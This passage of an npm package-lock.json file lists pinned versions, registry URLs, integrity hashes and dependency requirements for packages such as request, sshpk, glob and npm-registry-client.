"https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": 
"sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": 
"sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": 
true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", 
"integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": 
"sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": 
"^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": 
"https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", 
"aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": 
"https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": 
"sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": 
"sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": 
"1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- 